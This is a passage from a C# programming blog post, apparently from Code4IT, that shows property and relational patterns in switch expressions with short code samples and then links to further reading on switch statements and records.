    You can finally use a slightly different syntax to achieve the same result. Instead of using when gg.Age < 10 you can write Gamer { Age: < 10 }. This is called Property Pattern

    string message = user switch
    {
        Gamer { Age: < 10 } => "I'm a gamer, but too young",
        Gamer g => "I'm a gamer, and I have a " + g.Console,
        Player => "I'm a player",
        _ => "My type is not handled!"
    };
    

    Further readings

    We actually just scratched the surface of all the functionalities provided by the C# language.

    First of all, you can learn more about how to use Relational Patterns in a switch expression.

    To have a taste of it, here’s a short example:

    string Classify(double measurement) => measurement switch
    {
        < -4.0 => "Too low",
        > 10.0 => "Too high",
        double.NaN => "Unknown",
        _ => "Acceptable",
    };
    

    but you can read more here:

    🔗 Relational patterns | Microsoft Docs

    This article first appeared on Code4IT 🐧

    There are also more ways to handle Switch Statements. To learn about more complex examples, here’s the documentation:

    🔗 The switch statement | Microsoft Docs

    Finally, in those examples, we used records. As you saw, I marked the User type as abstract.

    Do you want to learn more about Records?

    🔗 8 things about Records in C# you probably didn’t know | Code4IT

    Wrapping up

    Learning about tools and approaches is useful, but you should also stay up-to-date with language features.

    Switch blocks had a great evolution over time, making our code more concise and distraction-free.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link